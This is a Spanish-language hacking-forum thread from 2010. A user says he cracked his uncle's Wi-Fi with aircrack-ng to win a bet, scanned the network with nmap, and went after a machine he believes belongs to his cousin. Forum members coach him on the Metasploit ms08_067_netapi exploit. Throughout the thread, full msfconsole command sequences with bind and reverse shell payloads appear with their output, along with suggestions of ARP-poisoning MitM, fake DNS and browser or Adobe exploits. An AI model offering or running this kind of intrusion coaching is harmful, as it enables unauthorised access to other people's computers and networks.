Título: Ayuda Nmap y Metasploit Publicado por: xv0 en 3 Enero 2010, 18:19 pm Hola
Bien este es mi problema, hice una a puesta con mi tio de que le entraria a su ordenador y tener el control del sistema.Yo uso Linux Lo primero que ice fue petarle el router con aircrack-ng para poder tener conexion a su red y asi poder entrarle, luego me conecto a traves de dhclient vale pos me conecto y dhclient me dice 1 cosa asi DHCPACK of 192.168.1.34 from 192.168.1.1 yo entiendo esto decirme si me confundo 192.168.1.34 es mi ip y 192.168.1.1 la suya no? Ok voy a nmap y ago esto nmap 192.168.1.1/24 me sale esto mas o menos PORT STATE SERVICE 20/tcp open ftp 23/tcp open ssh 26/tcp open telnet 83/tcp open http MAC Address: 00:2CXXXXXXXX Ok y abajo otra cosa q es esto Interesting ports on 192.168.1.32 PORT STATE SERVICE 6551/tcp open bittorrent-tracker MAC Address: 00:16:XXXXXXXX <-------- otra mac creo q es mi primo q baja con el bittorrent y esta conectado ala red por wifi Vale creo que ya e encontrado por donde entrar por bittorrent. ok escaneo la ip 192.168.1.32 esta vez ago esto nmap -O 192.168.1.32 Para saber q sistema usa on q ya lo sepa Me pone q es windows xp SP2 O SP3 Ok hasta aki me e kedado que EXPLOIT LE TENGO Q LANZAR Y COMO CON METASPLOIT y si e hecho algo mal. Gracias un saludo Título: Re: Ayuda Nmap y Metasploit Publicado por: Masita en 3 Enero 2010, 19:13 pm Bien lo primero: 192.168.1.1 es la puerta de enlace, para que nos entendamos es la ip del router. Sobre el ataque siendo esa version de windows primero tendrias que probar a atacar el SMB. El foro esta plagado de post hablando sobre el asi que busca.
Deberias aprender por que funcionan las cosas y no solo como se hacen. Asi que almenos busca el exploit por que lo nombran en infinidad de post. Y no utilices mayusculas indiscriminadamente o te llamaran la atencion. Título: Re: Ayuda Nmap y Metasploit Publicado por: AlbertoBSD en 3 Enero 2010, 19:59 pm Si como te comentaron 192.168.1.1 es la puerta de enlace en este caso "el router".
En ese caso en nmap usa la opcion -A que de da informacion de la version del programa que escucha en esos puertos, apartide de ahi buscas vulnerabiliades en securityfocus sobre el metasploit habria que ver si este tiene el exploit necesario para alguna vulnerabilidad. Saludos Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 3 Enero 2010, 19:59 pm Mira mis POST en las secciones de Hacking Avanzado y Hacking Basico. Tambien podes guiarte con mis videos.
http://www.youtube.com/user/alex19910218 Edit: Te recomiendo que uses el Scanner Nessus. ;) Saludos! Título: Re: Ayuda Nmap y Metasploit Publicado por: ChElAnO en 7 Enero 2010, 01:34 am intenta exploits para los bugs mas conocidos de windows como ms08-067.
usa metasploit Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 7 Enero 2010, 02:24 am el exploit es MSF se llama windows/smb/ms08_067_netapi
Título: Re: Ayuda Nmap y Metasploit Publicado por: xv0 en 7 Enero 2010, 18:23 pm Hola
Use el exploit windows/smb/ms08_067_netapi pero cuando cargo el ataque con el commando exploit me dice error os digo los pasos que ago aver que ago mal: use windows/smb/ms08_067_netapi show options set RHOST 192.168.1.32 <----------- es lo que me dio nmap de la vulnerabilidad de bittorrent set PAYLOAD windows/shell/bind_tcp show options exploit y me dice esto
Un saludo Título: Re: Ayuda Nmap y Metasploit Publicado por: Masita en 7 Enero 2010, 18:31 pm No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 7 Enero 2010, 18:36 pm No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST. No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.cpu2 Mira. qqUkCz5BrD8 | oZ7BsWXiVuE Saludos! Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 7 Enero 2010, 18:37 pm Citar No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST. NOOOOOOOO... Citar -] Exploit failed: The host (192.168.1.32:445) was unreachable. en otras palabras, no tiene el puerto abierto.. intentas explotar una vulnerabilidad de samba en un puerto mal configurado de bittotrrent?? Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 7 Enero 2010, 18:39 pm Pwned, como bien lo dijistes
PORT STATE SERVICE 6551/tcp open bittorrent-tracker Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445 Verificalo en el RPORT Título: Re: Ayuda Nmap y Metasploit Publicado por: Masita en 7 Enero 2010, 18:42 pm No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST. No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.Se que el payload es la accion y el rhost el host remoto si lo sabia, pero creia que tenias que declararlos uno despues del otro. Ya que dependiendo del payload tienes unas "options" u otras. Ademas no me habia fijado en el error en concreto mea culpa. :silbar: Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 7 Enero 2010, 18:45 pm cpu2 YOU'VE BEEN PWNED
(http://cdn0.knowyourmeme.com/i/7346/original/pwned4.jpg) Título: Re: Ayuda Nmap y Metasploit Publicado por: xv0 en 7 Enero 2010, 19:17 pm Gracais a todos por ayudarme y contestar tan rapido
Shell Root Nada e visto los 2 videos los e probado y nada me dice lo mismo en el segunbdo video que haces un payload windows/shell/reverse_tcp, cuando metes el RHOST 192.168.0.3 es tu ip? por que yo puse la mia y nada no funciona alguna idea? rokernault Como le exploto una vulnerabilidad de samba en un puerto de bittorrent a eso de samba me suena a algo de linux aa vaya imagen as puesto tio jeje. Un saludo Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 7 Enero 2010, 19:25 pm cpu2, a ver,
1. RHOST= Host_Remoto; LHOST= Host_Local RPORT= Puerto_Remoto; LPORT= Puerto_Local 2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque? PORT STATE SERVICE 6551/tcp open bittorrent-tracker Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose... Saludos! Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 7 Enero 2010, 19:49 pm samba
la he cagao.. http://en.wikipedia.org/wiki/Server_Message_Block saludos Título: Re: Ayuda Nmap y Metasploit Publicado por: xv0 en 7 Enero 2010, 20:00 pm Shell Root mira es lo que me sale ami
use exploit/windows/smb/ms08_067_netapi <------------- ningun problema show options Module options: Name Current Setting Required Description --------- ------------------ ------------ ------------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting Vale me sale eso por lo que e visto en el video todo igual set RHOST 192.168.1.32 set payload windows/shell/bind_tcp show options Module options: Name Current Setting Required Description --------- ------------------ ------------ ------------- RHOST 192.168.132 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/bind_tcp): Name Current Setting Required Description --------- ------------------ ------------ ------------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port LHOST 192.168.1.32 no The target address Exploit target: Id Name -- ---- 0 Automatic Targeting eso sale exploit * Started bind handler [-] Exploit failed: The host (192.168.1.32:445) was unreachable. * Exploit completed, but no session was created. eso es mi caso alguna idea creo que lo ago bien? Un saludo Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 7 Enero 2010, 20:07 pm 1. Ingresando RHOST y LHOST iguales, WTF!
No tiene problema, pero jajaja es raro, prefiero crearme tan siquiera una Maquina Virtual. :·P 2. Importante: La maquina a la que deseas ingresar con el exploit, no es vulnerable a ese exploit... xD 2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque? PORT STATE SERVICE 6551/tcp open bittorrent-tracker Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose... Saludos! Saludos! Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 7 Enero 2010, 20:16 pm Citar Module options: Name Current Setting Required Description --------- ------------------ ------------ ------------- RHOST 192.168.132 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/bind_tcp): Name Current Setting Required Description --------- ------------------ ------------ ------------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port LHOST 192.168.1.32 no The target address mira bien las ip.. da igual, la maquina no es vulnerable Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 7 Enero 2010, 20:42 pm mira bien las ip.. No tiene nada que ver, mira. Citar Código: | | _) | =[ metasploit v3.3.2-release [core:3.3 api:1.0] + -- --=[ 462 exploits - 219 auxiliary + -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7808 updated 28 days hago (2009.12.10) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2 RHOST => 192.168.0.2 msf exploit(ms08_067_netapi) > set LHOST 192.168.0.2 LHOST => 192.168.0.2 msf exploit(ms08_067_netapi) > exploit
Título: Re: Ayuda Nmap y Metasploit Publicado por: xv0 en 7 Enero 2010, 20:44 pm Como es posible si NMAP me dice que es vulnerable a eso -.-
¿alguna idea? jaja buena rockernalult me a pasao lo mismo que en la imagen jeje Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme. Un saludo Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 7 Enero 2010, 20:49 pm Como es posible si NMAP me dice que es vulnerable a eso -.- A ver Nmap te lanzo el puerto 6551/tcp bittorrent-tracker, No? Ok, dentro de los parametros de ejecucion del Exploit windows/smb/ms08_067_netapi, necesitas que esta abierto el puerto 445. Alguna duda, es simple... xD Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme. No te rindas... ;) . Nada es Imposible...Saludos! Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 7 Enero 2010, 20:58 pm Citar No tiene nada que ver, mira. es cierto... :laugh: Título: Re: Ayuda Nmap y Metasploit Publicado por: neuronass en 22 Febrero 2010, 03:36 am haber si alguien me ayuda...
escaneo: Citar Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-21 23:21 ART Interesting ports on 192.168.1.100: Not shown: 996 filtered ports PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 2869/tcp closed unknown Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds haber si allguein me pude ayudar.. Citar ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v3.3.4-dev [core:3.3 api:1.0] + -- --=[ 524 exploits - 246 auxiliary + -- --=[ 193 payloads - 23 encoders - 8 nops =[ svn r8578 updated today (2010.02.21) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100 RHOST => 192.168.1.100 msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.100 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set LHOST 192.168.1.102 LHOST => 192.168.1.102 msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.100 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST 192.168.1.102 yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > exploit
Título: Re: Ayuda Nmap y Metasploit Publicado por: togueter en 23 Febrero 2010, 15:43 pm A ver cpu2, por lo que se ve el ordenador de tu tio es vulnerable, busca por ahí si el bittorrent tiene alguna vulnerabilidad. Que esté el puerto de bittorrent abierto no quiere decir que puedas entrar por ahí. Seguramente tb tendrá parcheado el fallo de ms08_067netapi, por eso no te pirula el exploit; así que no hay na que rascar. Buscate otro metodo.
Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 23 Febrero 2010, 18:55 pm Que tal neuronass, veo que esta OPEN el microsoft-ds, pero para estár aun más seguros, intentad escanearlo con el Nessus!
togueter, WTF! Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 23 Febrero 2010, 22:03 pm Citar togueter, WTF! eso de plano es no saber..... +1 Título: Re: Ayuda Nmap y Metasploit Publicado por: tragantras en 24 Febrero 2010, 13:34 pm yo creo que el problema es que veis todo bajo el mismo punto de vista:
-Escaneo host en busca de puertos abiertos / servicios vulnerables -Metasploit hace el resto por mi... Qué pasa? que cuando queda parcheado un fallo TYPICAL pues se acaba el juego... hay mil cosas que pueds hacer, para empezar si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas ), prueba con ingeniería social... algun tipo de java applet infection ( hay varios posts en este foro sobre ello ), prueba con las 3333 vulnerabilidades que han salido recientemente en productos Adobe ( acrobat reader ) o con las de iexplore ( aurora ) o con las de Firefox... hay muchos caminos y restringirse tan solo al metasploit es lo peor que pueds hacer. un saludo! Título: Re: Ayuda Nmap y Metasploit Publicado por: togueter en 24 Febrero 2010, 19:03 pm ...por eso he puesto "buscate otro metodo" refiriendome a que busque otra forma q no sea usar ese exploit.
si me he equivocado lo siento, no hace falta ser groseros, llevo poco tiempo en esto. Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 24 Febrero 2010, 21:08 pm Citar si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas que opinas Shell Root?? Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 24 Febrero 2010, 21:22 pm que opinas Shell Root?? :silbar:Bueno, xD, ando de nuevo retirado, ocupaciones como "Desarrollador de Software", quitan demasiado tiempo. Así, solo diré... "Una vulnerabilidad es tan limitada como tu quieras que sea" y... [Ettercap] And [Metasploit], hacen una gran pareja! :D Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 24 Febrero 2010, 21:26 pm me referia a que es una tonteria... MiTM no es una vulnerabilidad...
podrias modificar los paquetes.. pero con que objeto??? Título: Re: Ayuda Nmap y Metasploit Publicado por: Shell Root en 24 Febrero 2010, 22:01 pm me referia a que es una tonteria... MiTM no es una vulnerabilidad... Es verdad... tan solo es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado...Tal vez si los paquetes fuesen "Archivos", se modificarian por algun PAYLOAD PD: fakedns.rb, responde a cualquier consulta DNS con una respuesta falsa apuntando a una dirección IP específica. Código
Título: Re: Ayuda Nmap y Metasploit Publicado por: tragantras en 26 Febrero 2010, 01:11 am me referia a que es una tonteria... MiTM no es una vulnerabilidad... podrias modificar los paquetes.. pero con que objeto??? jajaja, cierto cierto.... qué tontería esto de poder modificar los archivos que te bajes eh... mira que si alguien coge y te cambia tu crack.exe por virusaco.exe aisss que tonterías... xD Un MiTM yo lo considero que es una vulnerabilidad, es una vulnerabilidad de ciertas configuraciones de las tablas cache ARP. Hace 1 año o asi unos investigadores consiguieron hacer un MiTM a una camara de vigilancia IP, pudiendo insertar el video que quisiesen, eso tambien lo ves una tonteria? jaja si es capaz, de modificar los paquetes que un usuario se descarga tiene medio trabajo hecho... Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 26 Febrero 2010, 01:47 am que es eso de "ciertas configuraciones" ???
el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas.. y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo... modificar paquetes??? hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc) el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto... y respecto a MSF... si te sirve, bien si no... tambn... Título: Re: Ayuda Nmap y Metasploit Publicado por: tragantras en 27 Febrero 2010, 12:41 pm que es eso de "ciertas configuraciones" ??? el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas.. y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo... modificar paquetes??? hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc) el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto... y respecto a MSF... si te sirve, bien si no... tambn... con ciertas configuraciones me refería exactamente a lo que tu has mencionado, se pueden configurar las tablas de manera estática evitando el ARP poisoning o de manera dinámica siendo vulnerable ( aun que no quieras aceptar ese término ). modificar paquetes es una solucion perfectamente válida, quizá dificil de implementar, pero válida es xD Título: Re: Ayuda Nmap y Metasploit Publicado por: rockernault en 27 Febrero 2010, 14:39 pm y venga... que modificarias en los paquetes???
nada de que es dificil.. si lo mencionaste es porque sabes hacerlo.... |